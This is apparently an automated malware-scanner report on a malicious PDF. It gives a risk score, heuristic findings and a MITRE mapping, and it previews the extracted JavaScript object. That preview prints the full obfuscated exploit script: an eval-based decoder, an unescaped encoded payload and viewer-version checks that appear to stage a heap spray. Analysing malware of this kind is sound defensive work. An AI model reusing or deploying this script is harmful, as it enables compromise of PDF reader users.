MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The extracted JavaScript file, 'javascript_obj0007_000.js', is obfuscated and likely responsible for downloading and executing a secondary payload, a common technique for initial access. The document body text is largely unreadable, providing no further context.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
,d \){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1H 2t\(1a\){X Z=0;X 16="";2u\(Z=0;Z<1a.2z;Z++\){16=16+2i.1R\(1a.1O\(Z\)^1\)}1E 16}1H 1I\(1F\){1E 1L\(1F\)}X 1d=1M.1P.1S\(\);1d=1d.1G\(/\\\\D/g,""\) … ) -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x3AA | 7597 bytes |
SHA-256: be921cb5a430eff4ed94c524de40048440db17bdbeb38ae28353c6b32da3fb06 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function Ipv251m(Srw8yo4znn){
eval (
Srw8yo4znn
);
}
Ipv251m(
function(
p
,a
,c
,k
,e
,d
){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1H 2t(1a){X Z=0;X 16="";2u(Z=0;Z<1a.2z;Z++){16=16+2i.1R(1a.1O(Z)^1)}1E 16}1H 1I(1F){1E 1L(1F)}X 1d=1M.1P.1S();1d=1d.1G(/\\D/g,"");X 21="$1X$2I$N"+"3y$3z$3A"+"$r$3u$J"+"3q$3p$3r"+"$3s$3t$Q"+"3C$3K$3M"+"$t`3N$3J$J"+"3I$3D$3H"+"$3o$2Q$S"+"2S$2T$2U"+"$Y$2O$1c"+"2K$2J$r"+"$2L$2N$v"+"T$2V$2W"+"$K`$11$v"+"T$14$1D"+"$r$1m$V"+"3i$Y$P"+"$K`$11$v"+"T$1j$1h"+"$Q`1f$1g$v"+"3l$r$1l"+"$1C$1w$S"+"3m$2Z$1y"+"$1z$P$Q"+"3e`$3f$L"+"$14$12$v"+"3O$r$J`O"+"$U$1n$v"+"F$2X$12"+"$1A$r$v"+"17`$18`$J`O"+"$U$1b$v"+"F$2Y$K`"+"$3g$L$N"+"1k$18`$1q"+"$1r`$J`O$1o"+"3h$1b$r"+"$1s$N`1B$v"+"T$P$K`"+"$11$Y$N"+"1k$1D$r"+"$1m$3j$v"+"T$P$K`"+"$11$Y$S"+"2M$1h$Q`1f"+"$1g$2P$v"+"F$1l$1C"+"$1w$2R$J"+"3n$1y$1z"+"$P$K`$V"+"3G$L$14"+"$12$3F$v"+"F$J`O$U"+"$1n$r$N"+"3E$12$1A"+"$r$18`$v"+"17`$J`O$U"+"$1b$r$Q"+"3L$K`$t`3B"+"$L$14$v"+"17`$1q$1r`"+"$J`O$U$v"+"3v$r$1s"+"$N`1B$Y$19"+"3w$3x$N`4d"+"$2A$1W$v"+"F$r$r"+"$r$r$v"+"F$r$r"+"$1i$1V$13"+"1T$1U$1Y"+"$1Z$2g$13"+"27$24$2h"+"$1K$1J$v"+"1Q$1i$1N"+"$23$2H$13"+"2y$2w$2x"+"$2B$2C$R"+"2G$2F$2E"+"$2D$2v$1o"+"2n$2m`d$2l"+"$2j$2k$1c"+"2o$2p$r"+"$1p$W$v"+"F$t`1x$10"+"$W$r$R"+"2s$2r$2q"+"$1p$W$v"+"F$3k$4C"+"$r$1t`e$5m"+"5f$L$t`4Y"+"$1t`e$1u$v"+"1v$4X$t`e`c"+"$10$W$v"+"F$52`c$54"+"$5a`e$10$v"+"57$r$55"+"$5e$4W$t`"+"4V$4P$4O"+"$4N$4M$4Q"+"4R$4U$4T"+"$L$1j$19"+"3P$t`1x$4S"+"$5c$5k$v"+"1v$P$t`5w"+"$10$W$v"+"F$5v$5s"+"$r$r$v"+"F$r$r"+"$r$r$Q"+"5r$1u$L"+"$5q$5t$5u"+"5p$5n$5o"+"$5h`c$5i$1c"+"5j$5l$5g"+"$4Z$4K$V"+"4h$4g$4c"+"$47$4i$V"+"4j$4m$4l"+"$4k$44$V"+"40$3T$3S"+"$3R$3Q$R"+"3U$3V$3Z"+"$3Y$3X$R"+"3W$4n$4o"+"$4E$4D$R"+"4L$4B`$4F"+"$4G$4J$S"+"`u$1e$1e"+"$4I$4H$13"+"4A$4z$4s"+"$4r$4q$S"+"4p$4t$4u"+"$4y$4x$19"+"F"+"";X 15="@4@f@28@45@8@x@M@37@n@2e@l@8@i@9@41@s@28@30@29@20@3d@3d@20@22@38@22@20@26@26@20@45@8@x@M@37@n@2e@l@8@i@9@41@s@28@31@29@20@3c@3d@20@22@31@22@20@26@26@20@45@8@x@M@37@"+"n@2e@l@8@i@9@41@s@28@32@29@20@3c@3d@20@22@32@22@29@H@j@m@49@w@k@f@k@w@20@3d@20@51@35@B@p@C@35@8@o@28@48@u@G@37@w@36@B@28@4b@8@9@u@a@M@29@29@3b@j@m@k@i@9@2"+"0@59@y@k@p@38@o@8@f@C@20@3d@20@51@35@B@p@C@35@8@o@28@22@25@q@30@i@30@i@22@20@2b@20@22@25@q@30@i@30@i@22@20@2b@20@22@22@29@3b@j@m@k@i@9@20@4b@4@G@4@h@p@w@20@3d"+"@20@32@30@20@2b@20@49@w@k@f@k@w@2e@a@u@h@A@s@8@3b@j@m@x@8@4@a@u@28@59@y@k@p@38@o@8@f@C@2e@a@u@h@A@s@8@20@3c@20@4b@4@G@4@h@p@w@29@20@59@y@k@p@38@o@"+"8@f@C@20@2b@3d@20@59@y@k@p@38@o@8@f@C@3b@j@m@k@i@9@20@58@h@y@30@G@h@38@31@20@3d@20@59@y@k@p@38@o@8@f@C@2e@n@q@o@n@s@9@4@h@A@28@30@2c@20@4b@4@G@4@h@7"+"1@w@29@3b@j@m@k@i@9@20@4e@33@36@36@4@l@q@20@3d@20@59@y@k@p@38@o@8@f@C@2e@n@q@o@n@s@9@4@h@A@28@30@2c@20@59@y@k@p@38@o@8@f@C@2e@a@u@h@A@s@8@20@2d@20@4b"+"@4@G@4@h@p@w@29@3b@j@m@x@8@4@a@u@28@4e@33@36@36@4@l@q@2e@a@u@h@A@s@8@20@2b@20@4b@4@G@4@h@p@w@20@3c@20@30@C@36@30@30@30@30@29@20@4e@33@36@36@4@l@q@20@3d@20@"+"4e@33@36@36@4@l@q@20@2b@20@4e@33@36@36@4@l@q@20@2b@20@58@h@y@30@G@h@38@31@3b@j@m@k@i@9@20@53@35@w@36@y@y@20@3d@20@h@u@x@20@41@9@9@i@M@28@29@3b@j@m@f@w@9@28@5"+"3@u@4@8@30@y@35@20@3d@20@30@3b@20@53@u@4@8@30@y@35@20@3c@20@31@32@30@30@3b@20@53@u@4@8@30@y@35@2b@2b@29@H@53@35@w@36@y@y@5b@53@u@4@8@30@y@35@5d@20@3d@20@4e@33@36@36@4"+"@l@q@20@2b@20@49@w@k@f@k@w@I@j@m@k@i@9@20@42@i@z@z@f@q@38@37@37@20@3d@20@22@31@32@22@3b@j@m@f@w@9@20@28@k@i@9@20@45@x@n@B@x@E@3d@30@3b@20@45@x@n@B@x@E@"+"3c@31@38@3b@20@45@x@n@B@x@E@2b@2b@29@H@20@42@i@z@z@f@q@38@37@37@20@3d@20@42@i@z@z@f@q@38@37@37@2b@22@39@22@3b@I@j@m@f@w@9@20@28@k@i@9@20@45@x@n@B@x@E@3d@30@3"+"b@20@45@x@n@B@x@E@3c@32@37@36@3b@20@45@x@n@B@x@E@2b@2b@29@H@20@42@i@z@z@f@q@38@37@37@20@3d@20@42@i@z@z@f@q@38@37@37@2b@22@38@22@3b@I@j@20@20@20@20@q@s@4@a@2e@B"+"@9@4@h@s@f@28@22@25@34@35@30@30@30@f@22@2c@20@42@i@z@z@f@q@38@37@37@29@3b@j@I@j@u@a@n@u@H@j@20@20@20@20@j@m@k@i@9@20@4b@p@30@o@y@h@20@3d@20@h@u@x@20@41@9@"+"9@i@M@28@29@3b@j@m@f@q@h@l@s@4@w@h@20@50@34@B@34@x@9@n@28@46@37@31@z@4@a@8@2c@20@45@4@A@34@33@A@p@l@30@29@H@j@m@x@8@4@a@u@28@46@37@31@z@4@a@8@2e@a@6"+"5@h@A@s@8@20@2a@20@32@20@3c@20@45@4@A@34@33@A@p@l@30@29@H@j@m@46@37@31@z@4@a@8@20@2b@3d@20@46@37@31@z@4@a@8@3b@I@j@m@46@37@31@z@4@a@8@20@3d@20@46@37@31@z@4@a"+"@8@2e@n@q@o@n@s@9@4@h@A@28@30@2c@20@45@4@A@34@33@A@p@l@30@20@2f@20@32@29@3b@j@m@9@u@s@q@9@h@20@46@37@31@z@4@a@8@3b@I@j@m@k@i@9@20@4e@4@f@36@38@37@20@3d@"+"20@30@C@30@l@30@l@30@l@30@l@3b@j@m@k@i@9@20@4b@E@q@4@a@y@9@20@3d@20@51@35@B@p@C@35@8@o@28@48@u@G@37@w@36@B@28@4b@8@9@u@a@M@29@29@3b@j@m@k@i@9@20@48@B@6"+"2@33@s@f@9@8@20@3d@20@30@C@34@30@30@30@30@30@3b@j@m@k@i@9@20@4f@o@x@f@a@s@37@n@20@3d@20@4b@E@q@4@a@y@9@2e@a@u@h@A@s@8@20@2a@20@32@3b@j@m@k@i@9@20@45@4@A"+"@34@33@A@p@l@30@20@3d@20@48@B@o@33@s@f@9@8@20@2d@20@28@4f@o@x@f@a@s@37@n@2b@30@C@33@38@29@3b@j@m@k@i@9@20@46@37@31@z@4@a@8@20@3d@20@51@35@B@p@C@35@8@o@28@22@"+"25@q@39@30@39@30@25@q@39@30@39@30@22@29@3b@j@m@46@37@31@z@4@a@8@20@3d@20@50@34@B@34@x@9@n@28@46@37@31@z@4@a@8@2c@20@45@4@A@34@33@A@p@l@30@29@3b@j@m@k@i@9@20@4a@7"+"1@37@E@a@n@A@s@32@20@3d@20@28@4e@4@f@36@38@37@20@2d@20@30@C@34@30@30@30@30@30@29@20@2f@20@48@B@o@33@s@f@9@8@3b@j@m@f@w@9@20@28@k@i@9@20@56@32@h@h@31@a@n@p@20@3d"+"@20@30@3b@20@56@32@h@h@31@a@n@p@20@3c@20@4a@p@37@E@a@n@A@s@32@3b@56@32@h@h@31@a@n@p@2b@2b@29@H@4b@p@30@o@y@h@5b@56@32@h@h@31@a@n@p@5d@20@3d@20@46@37@31@z@4@a@"+"8@20@2b@20@4b@E@q@4@a@y@9@3b@I@j@m@k@i@9@20@56@l@4@o@38@35@f@20@3d@20@51@35@B@p@C@35@8@o@28@22@25@q@30@l@30@22@20@2b@20@22@l@25@q@30@l@22@20@2b@20@22@30@l@22@2"+"0@2b@20@22@22@29@3b@j@m@x@8@4@a@u@28@56@l@4@o@38@35@f@2e@a@u@h@A@s@8@20@3c@20@34@34@39@35@32@29@20@56@l@4@o@38@35@f@20@2b@3d@20@56@l@4@o@38@35@f@3b@j@m@s@8@4"+"@n@2e@l@w@a@a@i@o@53@s@w@9@u@20@3d@20@43@w@a@a@i@o@2e@l@w@a@a@u@l@s@45@y@i@4@a@49@h@f@w@28@H@n@q@o@E@3a@20@22@22@2c@y@n@A@3a@20@56@l@4@o@38@35@f@"+"I@29@3b@j@I"+"";15=15.1G(/@/g,"%4w");4v(1I(15));',62,343,'||||69||||68|72|6c|||||66||6e|61|0a|76|63|09|73|62|71|75|t1111|74||65|t1|6f|77|6d|7a|67|70|78||6a|111|64|7b|7d|td|t90d|t1113|79|t4|98|t9811|t9|t6|t2|110|tb390|t5|t130c|var|t1110|Vanapptig|t9412|t4db3|t84gg|t7|t4311|Eazbd55c|Ugbs1u||t117|t8|Gsac691|t104d|tc|Ehwy7s|t2129|b3|t248b|t10g7|t7456|t2011|311|tgc91|tgg11|t1341|tb|tc412|te1gg|t147|tgg43|t12|t0c94|113|t9917|e77|tb7dd|t2315|t1047|84|t6511|t9179|return|B1rp445|replace|function|Q5pqx5hb|t6863|t7063|unescape|app|t4165|charCodeAt|viewerVersion|150|fromCharCode|toString|e74|t4161|t4565|tb249|t4241|t6570|t5079||Khrely||t7g63|t5b75|||07g|||||||||t5b11|t7378|String|t98g6|t20g8|t38ge|t64|121|db1|t112b|t0bb7|t9269|19c|Hed7o6p|for|tg698|t7463|t6262|575|length|t4c48|t4611|t7d78|tg398|tcc11|t7274|954|t5072|t4340|t105d|gdd|tdg10|011|te7d9|t1011|t137d|t9c6b|t230b|b51|t4647|t4dcd|t4g11|t984d|t4143|t9843|tdc57|||||||||||||||0d|t54b3|t69b3|390|d84|t5d84|tce9e|372|30b|c57|t519e|t201e|e92|t75b1|t5112|t6921|t4e11|04d|e11|t4g4e|647|t8b44|t11d9|7b3|c1b|t9c18|143|t1043|4b3|t2551|c19|t519c|t1b51|843|t619c|e0b|043|7g7|t7775|t6111|t5074|t7b78|164|t3d75|270|t6372|t1174|t6974|77g||||t4575|||t115b|||||t5b55||||t3d5d|g5e|t4344|55b|t707g|t7b7d|t667g|t3d79|t7961|e75|t782g|t6179|t613d|t3724|t7479|eval|u00|t267g|t7b7b|t747e|g72|t3g2|t130g|t6579|t1161|t703g|t7b24|t7b74|t663g|t703d|t5b43|165|t4dd8|tdc52|t4d15|t6548|te|082|td1b0|t3694|t12d1|7g2|tgb40|t4111|c11|t44b2|||t4d||tec20|tb798||30c|||t47||t1213||te698|c94|tdedc|t10|t91bd|c2d|t0g94|t1365|t0|tgggg|t4d4g|g49|t4711|811|t1101|td946|tg|tdcb2|eb7'.split('|'),0,{}))
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.